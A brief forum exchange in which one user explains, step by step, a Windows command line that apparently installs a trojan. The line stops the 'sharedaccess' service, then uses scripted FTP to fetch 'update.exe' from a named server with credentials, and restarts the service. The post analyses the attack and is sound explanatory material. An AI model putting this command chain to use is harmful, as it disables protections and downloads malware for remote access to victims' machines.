[AWR]

Quote:

Originally Posted by chucker Let's analyze: cmd (cmd.exe) is the command-line processor in Windows NT (in DOS / Windows 9x, this was command.com), including Windows XP and Vista. The /c argument tells it to run one specific command and then exit (rather than staying open for further user input). net is a facility to manage NT services. stop sharedaccess, then, tells it to stop the service 'sharedaccess'. echo, like on Unix, is a way to print out text. The following commands – open ftp.holmenhast.se 21, user ftp.holmenhast.se f1634163f, binary, get update.exe, bye – are a list of FTP commands. ftp -n -v -s: which are then passed on to the FTP program. The commands log in to an FTP server with a specific user and download a file named update.exe. Finally, net start sharedacc launches the service again. We can deduce that this update is a replacement service to create a trojan horse, opening a Windows machine for remote access.

Nice work, Kojack. Here's a lollipop.